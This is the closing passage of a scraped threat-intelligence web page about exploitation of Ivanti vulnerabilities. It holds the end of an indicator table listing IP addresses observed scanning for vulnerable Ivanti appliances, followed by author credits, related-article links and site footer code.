padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">DSLog Backdoor</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">139.162.152.19</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">122.167.210.185</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">194.233.171.172</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.243</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.244</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.233</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> </body></html> <div id="nc_pixel"></div><div class="post__tags"> <a href="https://securityintelligence.com/tag/application-security/" rel="tag">Application Security</a><span> | </span><a href="https://securityintelligence.com/tag/data-protection/" rel="tag">Data Protection</a><span> | </span><a href="https://securityintelligence.com/tag/data-security/" rel="tag">Data Security</a><span> | </span><a href="https://securityintelligence.com/tag/incident-response-ir/" rel="tag">Incident Response (IR)</a><span> | </span><a href="https://securityintelligence.com/tag/known-vulnerabilities/" rel="tag">Known Vulnerabilities</a><span> | </span><a href="https://securityintelligence.com/tag/security-intelligence-analytics/" rel="tag">security intelligence & analytics</a><span> | </span><a href="https://securityintelligence.com/tag/threat-hunting/" rel="tag">threat hunting</a></div> <div class="post__author author co-authors "> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2020/06/Richard-Emerson.png);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/richard-emerson/" >Richard Emerson</a></div> <div class="author__role">Cyber Threat Intelligence Analyst</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2024/02/image.png);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/kevin-snider/">Kevin Snider</a></div> <div class="author__role">Cyber Threat Intelligence Consultant - X-Force - IBM</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/themes/sapphire/images/default-pic.jpg);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a></div> <div class="author__role">Malware Reverse Engineer, IBM Security</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2024/02/image-1.png);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/ruben-castillo/">Ruben Castillo</a></div> <div class="author__role">Incident Response Consultant - IBM X-Force</div> </div> </div> </div>  <style type="text/css"> .post__content--continue_reading{ max-height: 725px; overflow:hidden; transition: max-height cubic-bezier(0.9, 0, 1, 1) 2s; } @media (max-width: 768px) { .post__content--continue_reading{ max-height: 1225px; } } </style> <div class="continue_reading_wrapper" id="continue_reading"> <button on="tap: post__content.toggleClass(class=post__content--continue_reading), continue_reading.toggleClass(class=continue_reading_wrapper--clicked)" tabindex="0" role="button">Continue Reading</button> </div> </main> </div> </div> <aside class="grid__sidebar post__sidebar "> <div class="mobile_divider"></div> <header class="post__sidebar__header">POPULAR</header>  <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/" aria-label="What Telegram’s recent policy shift means for cyber crime"> <div class="article__img"> <amp-img alt="" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/A-dark-mystery-hand-typing-on-a-laptop-computer-at-night-630x330.jpeg.webp"> <amp-img fallback alt="" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/A-dark-mystery-hand-typing-on-a-laptop-computer-at-night-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/risk-management/" aria-label="https://securityintelligence.com/category/topics/risk-management/"> Risk Management </a>  <span class="article__date"> November 6, 2024 </span>  <a href="https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/" class="article__content_link" aria-label="What Telegram’s recent policy shift means for cyber crime"> <h2 class="article__title">What Telegram’s recent policy shift means for cyber crime</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Since its launch in August 2013, Telegram has become the go-to messaging app for privacy-focused users. To start using the app, users can sign up using either their real phone number or an anonymous number purchased from the Fragment blockchain… </p> </a> </div> </article> <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/communication-platforms-major-role-in-data-breach-risks/" aria-label="Communication platforms play a major role in data breach risks"> <div class="article__img"> <amp-img alt="Looking over the shoulder of a businessman sitting at a desk on a video conference call" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Virtual-Video-Conference-Call-Meeting-630x330.jpeg.webp"> <amp-img fallback alt="Looking over the shoulder of a businessman sitting at a desk on a video conference call" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Virtual-Video-Conference-Call-Meeting-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/data-protection/" aria-label="https://securityintelligence.com/category/topics/data-protection/"> Data Protection </a>  <span class="article__date"> November 19, 2024 </span>  <a href="https://securityintelligence.com/articles/communication-platforms-major-role-in-data-breach-risks/" class="article__content_link" aria-label="Communication platforms play a major role in data breach risks"> <h2 class="article__title">Communication platforms play a major role in data breach risks</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Every online activity or task brings at least some level of cybersecurity risk, but some have more risk than others. Kiteworks Sensitive Content Communications Report found that this is especially true when it comes to using communication tools. When it… </p> </a> </div> </article> <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/posts/autonomous-security-for-cloud-in-aws/" aria-label="Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future"> <div class="article__img"> <amp-img alt="Side view of a male sitting at a desk working on a computer in an office" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Side-view-of-focused-male-developer-coding-on-computer-while-sitting-at-working-at-office-630x330.jpeg.webp"> <amp-img fallback alt="Side view of a male sitting at a desk working on a computer in an office" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Side-view-of-focused-male-developer-coding-on-computer-while-sitting-at-working-at-office-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/cloud-protection/" aria-label="https://securityintelligence.com/category/topics/cloud-protection/"> Cloud Security </a>  <span class="article__date"> November 14, 2024 </span>  <a href="https://securityintelligence.com/posts/autonomous-security-for-cloud-in-aws/" class="article__content_link" aria-label="Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future"> <h2 class="article__title">Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 3</span> <span class="rt-label rt-postfix">min read</span></span> - </span>As the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is… </p> </a> </div> </article>  <div class="billboard_wrapper"> <a href="https://www.ibm.com/reports/data-breach?utm_medium=OSocial&utm_source=Blog&utm_content=RSRWW&utm_id=si-blog-right-rail " aria-label="A SPONSORED flag "> <amp-img layout='responsive' widht='300' height='250' src="https://securityintelligence.com/wp-content/uploads/2024/07/SIB_CODB_rightrail_banners2024-think_600x1200.png" alt="CODB right rail banner with red, blue, & purple lines in a wide circular pattern"> </amp-img> </a> </div> </aside> </div> <script> const kaltura = document.querySelectorAll("[data-widget=\"videoplayer\"]") if (kaltura != null) { kaltura.forEach(function(item){ const kId = item.id + '--' + item.dataset.videoid; document.getElementById(item.id).id = kId; getKalturaVideo(item); }) } </script> <div class="card_container_background "> <section class="container cards"> <h3>More from Threat Intelligence</h3> <div class="cards__wrapper"> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/"> <div class="article__img"> <amp-img alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp"> <amp-img fallback alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> November 12, 2024 </span> </div>  <a href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Strela Stealer: Today’s invoice is tomorrow’s phish </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 12</span> <span class="rt-label rt-postfix">min read</span></span> - </span>As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely to be… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/hive0147-serving-juicy-picanha-with-side-of-mekotio/"> <div class="article__img"> <amp-img alt="Closeup on a laptop screen displaying green code in a dimly red-lit room" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/10/Closeup-on-modern-female-with-laptop-writing-code-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a laptop screen displaying green code in a dimly red-lit room" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/10/Closeup-on-modern-female-with-laptop-writing-code-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> October 16, 2024 </span> </div>  <a href="https://securityintelligence.com/x-force/hive0147-serving-juicy-picanha-with-side-of-mekotio/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Hive0147 serving juicy Picanha with a side of Mekotio </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">min read</span></span> - </span>IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution. After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named "Picanha,” likely under continued development, deploying the Mekotio banking trojan. Hive0147… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/news/fysa-critical-rce-flaw-in-gnu-linux-systems/"> <div class="article__img"> <amp-img alt="Closeup on a red computer screen displaying code covered by a large ALERT message" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/07/computer-security-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a red computer screen displaying code covered by a large ALERT message" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/07/computer-security-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> September 26, 2024 </span> </div>  <a href="https://securityintelligence.com/news/fysa-critical-rce-flaw-in-gnu-linux-systems/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> FYSA – Critical RCE Flaw in GNU-Linux Systems </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 2</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Summary The first of a series of blog posts has been published detailing a vulnerability in the Common Unix Printing System (CUPS), which purportedly allows attackers to gain remote access to UNIX-based systems. The vulnerability, which affects various UNIX-based operating systems, can be exploited by sending a specially crafted HTTP request to the CUPS service. Threat Topography Threat Type: Remote code execution vulnerability in CUPS service Industries Impacted: UNIX-based systems across various industries, including but not limited to, finance, healthcare,… </p> </div> </a> </div> </article> </div> </section> </div>  <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.31.0-rc.0/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/cta-section.min.js"></script> <div style="background-color: #161616;"> <dds-cta-section data-autoid="dds--cta-section" children-custom-class="" class="container SI_padding"> <dds-cta-block no-border="" data-autoid="dds--cta-block"> <dds-content-block-heading class="copy" role="heading" aria-level="2" data-autoid="dds--content-block__heading" slot="heading"> <h2 >Topic updates</h2> </dds-content-block-heading> <dds-content-block-copy data-autoid="dds--content-block__copy" size="md" slot="copy"> <dds-content-block-paragraph data-autoid="dds--content-block-paragraph" class="copy"> Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research. </dds-content-block-paragraph> <div role="list" class="list_newletter"> <dds-button-cta data-autoid="dds-cta" cta-style="button" class="copy" cta-type="local" href="https://www.ibm.com/account/reg/us-en/signup?formid=news-urx-51966" kind="primary" icon-layout="" size=""> Subscribe today </dds-button-cta> </div> </dds-content-block-copy> </dds-cta-block> </dds-cta-section> </div> <dds-footer-container></dds-footer-container> <script> document.addEventListener('DOMContentLoaded', () => { const boxstyle = document.querySelector('.button2'); const removePadding = document.querySelector('dds-cta-section'); if (boxstyle) { const shadowRoot = boxstyle.shadowRoot; const bxContentSsectionDOM = shadowRoot.querySelector('.bx--btn'); if (bxContentSsectionDOM) { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.addEventListener('mouseover', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'rgba(141, 141, 141, 0.16)'; // }); // when mouse leave the element bxContentSsectionDOM.addEventListener('mouseout', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'transparent'; // Reset background color }); } } if(removePadding){ const shadowRoot = removePadding.shadowRoot; const removespace = shadowRoot.querySelector('.bx--content-section__leading'); if(removespace){ removespace.style.display = 'none'; } } }); document.querySelector("dds-footer-container").size = 'default'; //Uncomment this to add a custom links. // document.querySelector("dds-footer-container").adjunctLinks = [{ // 'title': 'IBM Custom Link', // 'link': 'https://ibm.com' // }, // { // 'title': 'IBM Custom Link2', // 'link': 'https://ibm.com' // } // ]; </script>  <div style="background-color: #13171a;"> <div class="container">  <section id="footer" class="footer">  <div class="footer__logo"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence"></amp-img> </div>  <div class="footer__copy"><p>Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.</p> </div>  <div class="footer__list"> <a href="/news/" class="footer__link">Cybersecurity News</a> <a href="/category/topics/" class="footer__link">By Topic</a> <a href="/category/industries/" class="footer__link">By Industry</a> <a href="/series/" class="footer__link">Exclusive Series</a> <a href="/x-force/" class="footer__link">X-Force</a> <a href="/media/" class="footer__link">Podcast</a> <a href="/events/" class="footer__link">Events</a> <a href="/about-us/" class="footer__link">Contact</a> <a href="/about-us/" class="footer__link">About Us</a> </div>  <div class="footer__social-networks"> <div class="headline">Follow us on social</div> <a href="http://www.twitter.com/ibmsecurity" aria-label="Twitter" class="footer__icon" style="left:-4px;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z" /> </svg> </a> <a href="http://www.linkedin.com/company/ibm-security" aria-label="LinkedIn" class="footer__icon" style="justify-self: center;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M4.98 3.5c0 1.381-1.11 2.5-2.48 2.5s-2.48-1.119-2.48-2.5c0-1.38 1.11-2.5 2.48-2.5s2.48 1.12 2.48 2.5zm.02 4.5h-5v16h5v-16zm7.982 0h-4.968v16h4.969v-8.399c0-4.67 6.029-5.052 6.029 0v8.399h4.988v-10.131c0-7.88-8.922-7.593-11.018-3.714v-2.155z" /> </svg> </a> <a href="https://www.youtube.com/@IBMTechnology" aria-label="YouTube" class="footer__icon" style="justify-self: end;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M19.615 3.184c-3.604-.246-11.631-.245-15.23 0-3.897.266-4.356 2.62-4.385 8.816.029 6.185.484 8.549 4.385 8.816 3.6.245 11.626.246 15.23 0 3.897-.266 4.356-2.62 4.385-8.816-.029-6.185-.484-8.549-4.385-8.816zm-10.615 12.816v-8l8 3.993-8 4.007z" /> </svg> </a> </div> </section> </div> </div> <div style="background-color:black"> <div class="container">  <section class="utility_bar">  <div class="utility_bar__links" aria-label="Footer Navigation"> <a href="http://www.ibm.com?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">© 2024 IBM</a> <a href="https://www.ibm.com/contact/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Contact</a> <a href="https://www.ibm.com/privacy/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Privacy</a> <a href="https://www.ibm.com/legal/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US&cm_mc_uid=03001744655915532865554&cm_mc_sid_50200000=84159441565120380187" target="_blank" rel="noopener, noreferrer">Terms of use</a> <a href="https://www.ibm.com/accessibility/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Accessibility</a> <a href="#" onclick="truste.eu.clickListener();return false;" target="_blank" rel="noopener, noreferrer">Cookie Preferences</a> </div>  <div class="utility_bar__sponsor"> <a href="http://ibm.com/security?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" data-icon="B" class="icon ibm" rel="noopener, noreferrer" style="padding-right:0px"> <span>Sponsored by <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 31.97 14.06"> <defs> <style> .cls-1 { fill: #fff; } </style> </defs> <title>si-icon-eightbarfeature</title> <path class="cls-1" d="M27.17,12.6h4.21v.84H27.17Zm0-1.68h4.21v.84H27.17Zm0-1.68h2.52v.84H27.17Zm0-1.69h2.52V8.4H27.17Zm0-1.68h2.52v.84H27.17Zm-.84-4.2.28-.85h4.77v.85Zm-.56,1.68.29-.84h5.32v.84ZM25.22,5l.28-.84h4.19V5Zm-.56,1.68L25,5.87h2.22l-.27.84Zm0,6.73-.28-.84H25Zm-.55-1.68-.29-.84H25.5l-.28.84Zm-.56-1.68-.27-.84H26l-.27.84ZM23,8.4l-.29-.85h3.9l-.28.85Zm-.57-1.69-.27-.84h2.22l.28.84Zm-2.8,2.53h2.53v.84H19.63Zm0-1.69h2.53V8.4H19.63Zm0-1.68h2.53v.84H19.63Zm0-.84V4.19h4.19l.29.84ZM18,12.6h4.21v.84H18Zm0-1.68h4.21v.84H18Zm0-7.57V2.51h5.32l.28.84Zm0-1.68V.82h4.76l.29.85ZM14.16,9.24H17a2.23,2.23,0,0,1,.07.37,2.49,2.49,0,0,1,0,.47H14.16Zm0-5h2.95a2.38,2.38,0,0,1,0,.46A2.18,2.18,0,0,1,17,5H14.16ZM9.11,9.24h2.52v.84H9.11Zm0-1.69H16a5,5,0,0,1,.4.4,2,2,0,0,1,.32.45H9.11Zm0-1.68h7.57a2,2,0,0,1-.32.45,4.89,4.89,0,0,1-.4.39H9.11Zm0-1.68h2.52V5H9.11ZM7.42,12.6H16a3.09,3.09,0,0,1-1,.62,3.73,3.73,0,0,1-1.32.22H7.42Zm0-1.68H17a2.47,2.47,0,0,1-.15.46,2.24,2.24,0,0,1-.21.38H7.42Zm0-8.41h9.22a1.91,1.91,0,0,1,.21.38,2.47,2.47,0,0,1,.15.46H7.42Zm0-1.69H13.6a3.73,3.73,0,0,1,1.32.23,3.09,3.09,0,0,1,1,.62H7.42Zm-5,8.42H4.9v.84H2.38Zm0-1.69H4.9V8.4H2.38Zm0-1.68H4.9v.84H2.38Zm0-1.68H4.9V5H2.38ZM.69,12.6H6.58v.84H.69Zm0-1.68H6.58v.84H.69Zm0-8.41H6.58v.84H.69ZM.69.82H6.58v.85H.69Z" /> </svg> </span> </a> </div> </section> </div> </div> <script> window._appInfo = window._appInfo || {}; window._appInfo.newsCredAPIKey = "YXJ0aWNsZT00MTQ0YmIzNmNjNDQxMWVlOTQyYjRlNWI2N2ZjMzg0Yg=="; </script>  <script type="text/javascript" id="qppr_frontend_scripts-js-extra"> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/securityintelligence.com\/defining-security-intelligence\/":[0,0,"https:\/\/securityintelligence.com\/defintion-security-intelligence\/#.VS_NwpNnuZA"],"https:\/\/securityintelligence.com\/security-vulnerability-management-its-about-outcomes-not-activity\/":[0,0,""]},"siteURL":"https:\/\/securityintelligence.com","siteURLq":"https:\/\/securityintelligence.com"}; /* ]]> */ </script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4" id="qppr_frontend_scripts-js"></script> <script> setTimeout(() => { document.querySelector(".related_content").style.visibility = 'visible'; document.querySelector(".related_content.article.article_grid.article__mobile--card.article--IBM_blog > c4d-card > c4d-card-footer").shadowRoot.querySelector("#link").style.justifyContent = 'flex-start'; }, 100); </script> </body> </html>

CINXE.COM

Widespread exploitation of recently disclosed Ivanti vulnerabilities